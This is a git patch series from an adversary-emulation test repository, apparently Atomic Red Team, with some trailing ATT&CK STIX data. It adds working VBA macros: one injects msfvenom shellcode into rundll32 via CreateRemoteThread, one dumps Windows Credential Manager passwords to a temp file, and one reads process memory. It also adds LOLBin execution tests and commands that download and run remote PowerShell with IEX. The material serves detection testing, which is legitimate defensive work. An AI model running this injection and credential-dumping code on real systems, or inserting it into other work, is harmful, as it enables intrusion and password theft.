Ryuk in 5 Hours. Retrieved October 19, 2020.", + "url": "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/" + } + ], + "id": "relationship--43b9a1b5-6f95-4c6c-8e1f-59f9049e3afb", + "target_ref": "tool--b77b563c-34bb-4fb8-86a3-3694338f7b47", + "type": "relationship", + "created": "2020-11-10T18:04:03.589Z", + "description": "(Citation: DFIR Ryuk's Return October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T18:04:03.589Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + } + ], + "id": "relationship--c118e50b-4559-4bff-bde5-78aa426f3db4", + "target_ref": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60", + "type": "relationship", + "created": "2020-11-10T18:04:03.666Z", + "description": "(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T18:04:03.666Z" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + }, + { + "source_name": "DFIR Ryuk in 5 Hours October 2020", + "description": "The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.", + "url": "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/" + }, + { + "source_name": "Sophos New Ryuk Attack October 2020", + "description": "Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They\u2019re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.", + "url": "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/" + } + ], + "id": "relationship--fcee0cef-7d5b-49da-928c-2a3d0cfd06b0", + "target_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "type": "relationship", + "created": "2020-11-10T18:04:03.668Z", + "description": "(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)(Citation: Sophos New Ryuk Attack October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T18:04:03.668Z" + }, { "type": "marking-definition", "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", From 43fc8a35163d2915d5b7f44615ca8f4594f9d0f4 Mon Sep 17 00:00:00 2001 From: Ama Smuggle Avocados <47680420+amasmuggleavocados@users.noreply.github.com> Date: Fri, 11 Dec 2020 09:52:24 -0500 Subject: [PATCH 005/131] Extractmemory (#1318) * initial push for T1005 (Extract Memory via VBA) * updates * updates * update * update * moved to T1059.005 Co-authored-by: avocado Co-authored-by: Carrie Roberts --- atomics/T1059.005/T1059.005.yaml | 34 +++++++++++ atomics/T1059.005/src/T1059_005-macrocode.txt | 57 +++++++++++++++++++ 2 files changed, 91 insertions(+) create mode 100644 atomics/T1059.005/src/T1059_005-macrocode.txt diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml index d4a38b2b..53b543be 100644 --- a/atomics/T1059.005/T1059.005.yaml +++ b/atomics/T1059.005/T1059.005.yaml @@ -28,6 +28,7 @@ atomic_tests: Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore name: powershell + - name: Encoded VBS code execution auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa description: | @@ -59,3 +60,36 @@ atomic_tests: Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null name: powershell +- name: Extract Memory via VBA + auto_generated_guid: + description: | + This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this + we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that + memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin. + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: | + Microsoft #{ms_product} must be installed + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract" + cleanup_command: | + Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore + name: powershell \ No newline at end of file diff --git a/atomics/T1059.005/src/T1059_005-macrocode.txt b/atomics/T1059.005/src/T1059_005-macrocode.txt new file mode 100644 index 00000000..fa5bcfa4 --- /dev/null +++ b/atomics/T1059.005/src/T1059_005-macrocode.txt @@ -0,0 +1,57 @@ +Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (var() As Any) As LongPtr + +#If Win64 Then + Public Const PTR_LENGTH As Long = 8 +#Else + Public Const PTR_LENGTH As Long = 4 +#End If + +Public Declare PtrSafe Sub Mem_Copy Lib "kernel32" Alias "RtlMoveMemory" ( _ + ByRef Destination As Any, _ + ByRef Source As Any, _ + ByVal Length As Long) + +Function HexPtr(ByVal Ptr As LongPtr) As String + HexPtr = Hex$(Ptr) + HexPtr = String$((PTR_LENGTH * 2) - Len(HexPtr), "0") & HexPtr +End Function + +Public Function Mem_ReadHex(ByVal Ptr As LongPtr, ByVal Length As Long) As String + Dim bBuffer() As Byte, strBytes() As String, i As Long, ub As Long, b As Byte + ub = Length - 1 + ReDim bBuffer(ub) + ReDim strBytes(ub) + Mem_Copy bBuffer(0), ByVal Ptr, Length + For i = 0 To ub + b = bBuffer(i) + strBytes(i) = IIf(b < 16, "0", "") & Hex$(b) + Next + Mem_ReadHex = Join(strBytes, "") +End Function + +Sub Extract() + + Dim cnt As Integer + Dim memArray() As Variant + Dim strVar As String, ptrVar As LongPtr, ptrBSTR As LongPtr + + strVar = "Atomic T1005 test" + outDir = Environ("TEMP") + "\atomic_t1005_test_output.bin" + + ptrVar = VarPtr(strVar) + Mem_Copy ptrBSTR, ByVal ptrVar, PTR_LENGTH + + cnt = 0 + Do + ReDim Preserve memArray(cnt) + memArray(cnt) = Mem_ReadHex(ptrBSTR + cnt, 1) + cnt = cnt + 1 + Loop While cnt < (Len(strVar) * 2) + + Open (outDir) For Binary Lock Read Write As #1 + For a = 0 To UBound(memArray) + Put #1, , CByte("&h" & memArray(a)) + Next a + Close + +End Sub \ No newline at end of file From 9e352ddc2d86c859dce7aeb9987bef56134419bc Mon Sep 17 00:00:00 2001 From: Ama Smuggle Avocados <47680420+amasmuggleavocados@users.noreply.github.com> Date: Fri, 11 Dec 2020 09:55:17 -0500 Subject: [PATCH 006/131] Shellcodevba (#1326) * initial push for T1055 (Shellcode execution via VBA) * updates * updates * updates Co-authored-by: avocado Co-authored-by: Carrie Roberts --- atomics/T1055/T1055.yaml | 28 ++++ atomics/T1055/src/x64/T1055-macrocode.txt | 149 ++++++++++++++++++++++ 2 files changed, 177 insertions(+) create mode 100644 atomics/T1055/src/x64/T1055-macrocode.txt diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index f686ab64..b97c2f1d 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -34,3 +34,31 @@ atomic_tests: mavinject $mypid /INJECTRUNNING #{dll_payload} name: powershell elevation_required: true +- name: Shellcode execution via VBA + auto_generated_guid: + description: | + This module injects shellcode into a newly created process and executes. By default the shellcode is created, + with Metasploit, for use on x86-64 Windows 10 machines. + + Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office + is required. + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: | + The 64-bit version of Microsoft Office must be installed + prereq_command: | + try { + $wdApp = New-Object -COMObject "Word.Application" + $path = $wdApp.Path + Stop-Process -Name "winword" + if ($path.contains("(x86)")) { exit 1 } else { exit 0 } + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" + name: powershell \ No newline at end of file diff --git a/atomics/T1055/src/x64/T1055-macrocode.txt b/atomics/T1055/src/x64/T1055-macrocode.txt new file mode 100644 index 00000000..1c7a0104 --- /dev/null +++ b/atomics/T1055/src/x64/T1055-macrocode.txt @@ -0,0 +1,149 @@ +Private Type PROCESS_INFORMATION + hProcess As Long + hThread As Long + dwProcessId As Long + dwThreadId As Long +End Type + +Private Type STARTUPINFO + cb As Long + lpReserved As String + lpDesktop As String + lpTitle As String + dwX As Long + dwY As Long + dwXSize As Long + dwYSize As Long + dwXCountChars As Long + dwYCountChars As Long + dwFillAttribute As Long + dwFlags As Long + wShowWindow As Integer + cbReserved2 As Integer + lpReserved2 As Long + hStdInput As Long + hStdOutput As Long + hStdError As Long +End Type + +Private Declare PtrSafe Function createRemoteThread Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, _ + ByVal lpThreadAttributes As Long, _ + ByVal dwStackSize As Long, _ + ByVal lpStartAddress As LongPtr, _ + lpParameter As Long, _ + ByVal dwCreationFlags As Long, _ + lpThreadID As Long) As LongPtr + +Private Declare PtrSafe Function virtualAllocEx Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, _ + ByVal lpAddr As Long, _ + ByVal lSize As Long, _ + ByVal flAllocationType As Long, _ + ByVal flProtect As Long) As LongPtr + +Private Declare PtrSafe Function writeProcessMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, _ + ByVal lDest As LongPtr, _ + ByRef Source As Any, _ + ByVal Length As Long, _ + ByVal LengthWrote As LongPtr) As Boolean + +Private Declare PtrSafe Function createProcessA Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, _ + ByVal lpCommandLine As String, _ + lpProcessAttributes As Any, _ + lpThreadAttributes As Any, _ + ByVal bInheritHandles As Long, _ + ByVal dwCreationFlags As Long, _ + lpEnvironment As Any, _ + ByVal lpCurrentDirectory As String, _ + lpStartupInfo As STARTUPINFO, _ + lpProcessInformation As PROCESS_INFORMATION) As Boolean + +Private Declare PtrSafe Function getProcessHandle Lib "kernel32" Alias "GetCurrentProcess" () As LongLong + +Private Sub Execute() + +Const MEM_COMMIT = &H1000 +Const PAGE_EXECUTE_READWRITE = &H40 + +Dim sc As String +Dim scLen As Long +Dim byteArray() As Byte +Dim memoryAddress As LongLong +Dim pHandle As LongLong +Dim sNull As String +Dim sInfo As STARTUPINFO +Dim pInfo As PROCESS_INFORMATION + +' ./msfvenom --arch x64 --platform windows -p windows/x64/exec CMD=calc.exe -f c +sc = "fc4883e4f0e8c00000004151415052" +sc = sc & "51564831d265488b5260488b521848" +sc = sc & "8b5220488b7250480fb74a4a4d31c9" +sc = sc & "4831c0ac3c617c022c2041c1c90d41" +sc = sc & "01c1e2ed524151488b52208b423c48" +sc = sc & "01d08b80880000004885c074674801" +sc = sc & "d0508b4818448b40204901d0e35648" +sc = sc & "ffc9418b34884801d64d31c94831c0" +sc = sc & "ac41c1c90d4101c138e075f14c034c" +sc = sc & "24084539d175d858448b40244901d0" +sc = sc & "66418b0c48448b401c4901d0418b04" +sc = sc & "884801d0415841585e595a41584159" +sc = sc & "415a4883ec204152ffe05841595a48" +sc = sc & "8b12e957ffffff5d48ba0100000000" +sc = sc & "000000488d8d0101000041ba318b6f" +sc = sc & "87ffd5bbf0b5a25641baa695bd9dff" +sc = sc & "d54883c4283c067c0a80fbe07505bb" +sc = sc & "4713726f6a00594189daffd563616c" +sc = sc & "632e65786500" + +scLen = Len(sc) / 2 +ReDim byteArray(0 To scLen) + +For i = 0 To scLen - 1 + If i = 0 Then + pos = i + 1 + Else + pos = i * 2 + 1 + End If + Value = Mid(sc, pos, 2) + byteArray(i) = Val("&H" & Value) +Next + +res = createProcessA(sNull, _ + "C:\Windows\System32\rundll32.exe", _ + ByVal 0&, _ + ByVal 0&, _ + ByVal 1&, _ + ByVal 4&, _ + ByVal 0&, _ + sNull, _ + sInfo, _ + pInfo) +Debug.Print "[+] CreateProcessA() returned: " & res + +newAllocBuffer = virtualAllocEx(pInfo.hProcess, _ + 0, _ + UBound(byteArray), _ + MEM_COMMIT, _ + PAGE_EXECUTE_READWRITE) +Debug.Print "[+] VirtualAllocEx() returned: 0x" & Hex(newAllocBuffer) + +Debug.Print "[*] Writing memory..." +For Offset = 0 To UBound(byteArray) + myByte = byteArray(Offset) + res = writeProcessMemory(pInfo.hProcess, _ + newAllocBuffer + Offset, _ + byteArray(Offset), _ + 1, _ + ByVal 0&) +Next Offset +Debug.Print "[+] WriteProcessMemory() returned: " & res + +Debug.Print "[+] Executing shellcode now..." +res = createRemoteThread(pInfo.hProcess, _ + 0, _ + 0, _ + newAllocBuffer, _ + 0, _ + 0, _ + 0) + +End Sub \ No newline at end of file From 46b69318c8ecdd55b0a01a9f574dcb0c86465ed6 Mon Sep 17 00:00:00 2001 From: Ama Smuggle Avocados <47680420+amasmuggleavocados@users.noreply.github.com> Date: Fri, 11 Dec 2020 10:34:34 -0500 Subject: [PATCH 007/131] Credmanager (#1327) * initial push for T1555 (Extract Windows Credential Manager via Maldoc) * updates * updates * update Co-authored-by: avocado Co-authored-by: Carrie Roberts --- atomics/T1555/T1555.yaml | 29 +++++ atomics/T1555/src/T1555-macrocode.txt | 157 ++++++++++++++++++++++++++ 2 files changed, 186 insertions(+) create mode 100644 atomics/T1555/T1555.yaml create mode 100644 atomics/T1555/src/T1555-macrocode.txt diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml new file mode 100644 index 00000000..ad1785e4 --- /dev/null +++ b/atomics/T1555/T1555.yaml @@ -0,0 +1,29 @@ +attack_technique: T1555 +display_name: 'Credentials from Password Stores' +atomic_tests: +- name: Extract Windows Credential Manager via VBA + auto_generated_guid: + description: | + This module will extract the credentials found within the Windows credential manager and dump + them to $env:TEMP\windows-credentials.txt + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: | + Microsoft Word must be installed + prereq_command: | + try { + New-Object -COMObject "word.Application" | Out-Null + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft Word manually to meet this requirement" + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" + cleanup_command: | + Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore + name: powershell diff --git a/atomics/T1555/src/T1555-macrocode.txt b/atomics/T1555/src/T1555-macrocode.txt new file mode 100644 index 00000000..0c9e0512 --- /dev/null +++ b/atomics/T1555/src/T1555-macrocode.txt @@ -0,0 +1,157 @@ +Private Declare PtrSafe Function CEnumerateA Lib "advapi32.dll" Alias "CredEnumerateA" (ByVal Filter As String, _ + ByVal Flags As Long, _ + ByRef Count As Long, _ + ByRef credential As LongPtr) As Boolean + +Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (var() As Any) As LongPtr + +Public Const CRED_TYPE_GENERIC = &H1 +Public Const CRED_PERSIST_LOCAL_MACHINE = &H2 + +#If Win64 Then + Public Const PTR_LENGTH As Long = 8 + Public Const PTR_PW_LENGTH As Long = 80 + Public Const PTR_PW_LOC As Long = 88 +#Else + Public Const PTR_LENGTH As Long = 4 + Public Const PTR_PW_LENGTH As Long = 52 + Public Const PTR_PW_LOC As Long = 56 +#End If + +Public Declare PtrSafe Sub Mem_Copy Lib "kernel32" Alias "RtlMoveMemory" (ByRef Destination As Any, _ + ByRef Source As Any, _ + ByVal Length As Long) + +Public Function strReverse_Character_Pairs(ByVal strValue As String) As String + + Dim lngLoop As Long + Dim strReturn As String + + strReturn = "" + + For lngLoop = Len(strValue) - 1& To 1& Step -2& + strReturn = strReturn & Mid$(strValue, lngLoop, 2) + Next lngLoop + + strReverse_Character_Pairs = strReturn +End Function + +Function HexPtr(ByVal Ptr As LongPtr) As String + HexPtr = Hex$(Ptr) + HexPtr = String$((PTR_LENGTH * 2) - Len(HexPtr), "0") & HexPtr +End Function + +Public Function HexToString(ByVal HexToStr As String) As String + Dim strTemp As String + Dim strReturn As String + Dim k As Long + + For k = 1 To Len(HexToStr) Step 2 + strTemp = Chr$(Val("&H" & Mid(HexToStr, k, 2))) + strReturn = strReturn & strTemp + Next k + HexToString = Right(strReturn, Len(strReturn)) +End Function + +Public Function Mem_ReadHex(ByVal Ptr As LongPtr, ByVal Length As Long) As Variant + Dim bBuffer() As Byte + Dim strBytes() As String + Dim I As Long + Dim ub As Long + Dim b As Byte + + ub = Length - 1 + ReDim bBuffer(ub) + ReDim strBytes(ub) + Mem_Copy bBuffer(0), ByVal Ptr, Length + For I = 0 To ub + b = bBuffer(I) + strBytes(I) = IIf(b < 16, "0", "") & Hex$(b) + Next + + Mem_ReadHex = Join(strBytes, "") +End Function + + +Sub Extract() + +' Control Panel -> Credential Manager -> Windows Credentials + +Dim name As String +Dim creds As LongPtr +Dim dwCount As Long + +Dim ptrTemp As LongPtr +Dim ptrArray() As LongPtr +Dim memArray() As Variant + +Dim fs As Object +Dim fPath As String + +Set fs = CreateObject("Scripting.FileSystemObject") +fPath = Environ$("TEMP") + "\windows-credentials.txt" +Set out = fs.CreateTextFile(fPath, True) + +Dim cnt As Integer +cnt = 0 + +s = CEnumerateA(vbNullString, 0, dwCount, creds) +out.WriteLine ("Number of Creds: " & dwCount & vbNewLine) + +For I = 1 To dwCount + + ReDim Preserve ptrArray(I) + ptrTemp = creds + ((I - 1) * PTR_LENGTH) + Mem_Copy ptrArray(I), ByVal ptrTemp, PTR_LENGTH + +Next I + +For I = 1 To UBound(ptrArray) + TargetName = "" + UserName = "" + fnl = "" + nullCnt = 0 + cnt = 0 + + targetAliasPtr = CDec("&h" & strReverse_Character_Pairs(Mem_ReadHex(ptrArray(I) + 8, PTR_LENGTH))) + + Do Until nullCnt = 2 + blob = Mem_ReadHex(targetAliasPtr + cnt, 1) + fnl = fnl + blob + If blob = "00" Then + nullCnt = nullCnt + 1 + End If + cnt = cnt + 1 + Loop + + arrayOfTargetandUser = Split(HexToString(fnl), vbNullChar) + + If UBound(arrayOfTargetandUser) > 0 Then + TargetName = arrayOfTargetandUser(0) + UserName = arrayOfTargetandUser(1) + out.WriteLine ("Target Name: " & TargetName) + out.WriteLine ("User Name: " & UserName) + Else + TargetName = arrayOfTargetandUser(0) + out.WriteLine ("Target Name: " & TargetName) + End If + + Flags = Mem_ReadHex(ptrArray(I) + 4, 1) + If Flags = "01" Then + ' Password Length + pwLen = CDec("&H" & strReverse_Character_Pairs(Mem_ReadHex(ptrArray(I) + PTR_PW_LENGTH, 4))) + + ' Password as wide hex + pwd = Replace(Mem_ReadHex(ptrArray(I) + PTR_PW_LOC, pwLen), "00", "") + out.WriteLine ("Credential Type: Generic") + out.WriteLine ("Password: " & HexToString(pwd) & vbNewLine) + + Else + out.WriteLine ("Credential Type: Windows") + out.WriteLine ("Password: WINDOWS CREDENTIAL (NULL)" & vbNewLine) + End If +Next I + +out.Close + +End Sub \ No newline at end of file From 5db071d2882be9c134474bf5f3b701de927470cb Mon Sep 17 00:00:00 2001 From: JimmyAstle Date: Tue, 15 Dec 2020 15:47:39 -0500 Subject: [PATCH 008/131] Workflow compiler tests (#1331) * Adding in Workflow Compiler Tests This adds 2 workflow compiler tests. 1.) Test 6 will execute workflow compiler with a pre-build assembly that invokes cal. 2.) Test 7 will rename workflow compilers and execute the same pre-build assembly that invokes calc. * minor path updates Co-authored-by: Jimmy Astle --- atomics/T1218/T1218.yaml | 53 ++++++++++++++++++++++++++++++++++++ atomics/T1218/src/T1218.xml | 32 ++++++++++++++++++++++ atomics/T1218/src/T1218.xoml | 10 +++++++ 3 files changed, 95 insertions(+) create mode 100644 atomics/T1218/src/T1218.xml create mode 100644 atomics/T1218/src/T1218.xoml diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index 1c1e297d..5ead4c3e 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -123,3 +123,56 @@ atomic_tests: elevation_required: false command: | "#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" +- name: Microsoft.Workflow.Compiler.exe Payload Execution + description: | + Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe + supported_platforms: + - windows + input_arguments: + xml_payload: + description: XML to execution + type: path + default: PathToAtomicsFolder\T1218\src\T1218.xml + dependency_executor_name: powershell + dependencies: + - description: | + .Net must be installed for this test to work correctly. + prereq_command: | + if (Test-Path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe ) {exit 0} else {exit 1} + get_prereq_command: | + write-host ".Net must be installed for this test to work correctly." + executor: + command: | + Set-Location -path PathToAtomicsFolder\T1218\src ; + C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{xml_payload}" output.txt + name: powershell + elevation_required: false +- name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions + description: | + Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe + supported_platforms: + - windows + input_arguments: + xml_payload: + description: XML to execution + type: path + default: PathToAtomicsFolder\T1218\src\T1218.xml + renamed_binary: + description: renamed Microsoft.Workflow.Compiler + type: path + default: PathToAtomicsFolder\T1218\src\svchost.exe + dependency_executor_name: powershell + dependencies: + - description: | + .Net must be installed for this test to work correctly. + prereq_command: | + Copy-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{renamed_binary}" -Force + if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} + get_prereq_command: | + write-host "you need to rename workflow complier before you run this test" + executor: + command: | + Set-Location -path PathToAtomicsFolder\T1218\src ; + #{renamed_binary} #{xml_payload} output.txt + name: powershell + elevation_required: false diff --git a/atomics/T1218/src/T1218.xml b/atomics/T1218/src/T1218.xml new file mode 100644 index 00000000..5f6f731e --- /dev/null +++ b/atomics/T1218/src/T1218.xml @@ -0,0 +1,32 @@ + + + +T1218.xoml + + + + + + + +false +true +false + + + + +false +-1 + +false +false + +false +CSharp + + + + + + \ No newline at end of file diff --git a/atomics/T1218/src/T1218.xoml b/atomics/T1218/src/T1218.xoml new file mode 100644 index 00000000..563c7049 --- /dev/null +++ b/atomics/T1218/src/T1218.xoml @@ -0,0 +1,10 @@ + + + + \ No newline at end of file From 28086402e20d7f06cd27545ccb90df672c303510 Mon Sep 17 00:00:00 2001 From: Keith McCammon Date: Tue, 15 Dec 2020 14:18:41 -0700 Subject: [PATCH 009/131] Maintainers updates (#1328) * Update maintainers.md Remove reference to announcements channel, which has been created. * Generate docs from job=validate_atomics_generate_docs branch=maintainers-updates * Update maintainers.md Updates to maintainers meeting purpose, scope, and agendas. * Generate docs from job=validate_atomics_generate_docs branch=maintainers-updates Co-authored-by: CircleCI Atomic Red Team doc generator Co-authored-by: Carrie Roberts --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 108 +- atomics/Indexes/Indexes-CSV/linux-index.csv | 18 +- atomics/Indexes/Indexes-CSV/macos-index.csv | 40 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 166 +- atomics/Indexes/Indexes-Markdown/index.md | 260 +- .../Indexes/Indexes-Markdown/linux-index.md | 183 +- .../Indexes/Indexes-Markdown/macos-index.md | 146 +- .../Indexes/Indexes-Markdown/windows-index.md | 289 +- atomics/Indexes/Matrices/linux-matrix.md | 105 +- atomics/Indexes/Matrices/macos-matrix.md | 53 +- atomics/Indexes/Matrices/matrix.md | 206 +- atomics/Indexes/Matrices/windows-matrix.md | 148 +- atomics/Indexes/index.yaml | 16040 +++++++++++----- atomics/T1018/T1018.md | 4 +- atomics/T1053.005/T1053.005.md | 50 + atomics/T1053.005/T1053.005.yaml | 2 +- atomics/T1055.012/T1055.012.md | 49 + atomics/T1055.012/T1055.012.yaml | 2 +- atomics/T1055/T1055.md | 48 + atomics/T1055/T1055.yaml | 2 +- atomics/T1056.001/T1056.001.md | 3 +- atomics/T1056.002/T1056.002.md | 2 +- atomics/T1059.002/T1059.002.md | 8 +- atomics/T1059.003/T1059.003.md | 2 +- atomics/T1059.005/T1059.005.md | 57 +- atomics/T1059.005/T1059.005.yaml | 2 +- atomics/T1070.003/T1070.003.md | 12 +- atomics/T1095/T1095.md | 3 +- atomics/T1115/T1115.md | 54 + atomics/T1115/T1115.yaml | 2 +- atomics/T1135/T1135.md | 4 +- atomics/T1201/T1201.md | 2 +- atomics/T1218.002/T1218.002.md | 8 +- atomics/T1218.003/T1218.003.md | 2 +- atomics/T1218/T1218.md | 90 + atomics/T1218/T1218.yaml | 2 + atomics/T1222.001/T1222.001.md | 2 +- atomics/T1543.002/T1543.002.md | 2 +- atomics/T1546.011/T1546.011.md | 2 +- atomics/T1546.012/T1546.012.md | 4 +- atomics/T1547.001/T1547.001.md | 6 +- atomics/T1548.002/T1548.002.md | 2 +- atomics/T1555/T1555.md | 55 + atomics/T1555/T1555.yaml | 2 +- atomics/T1562.003/T1562.003.md | 10 +- atomics/T1566.001/T1566.001.md | 2 +- atomics/T1574.012/T1574.012.md | 2 +- atomics/used_guids.txt | 8 + docs/maintainers.md | 16 +- 51 files changed, 12378 insertions(+), 5911 deletions(-) create mode 100644 atomics/T1555/T1555.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 03b04c3f..89915caf 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 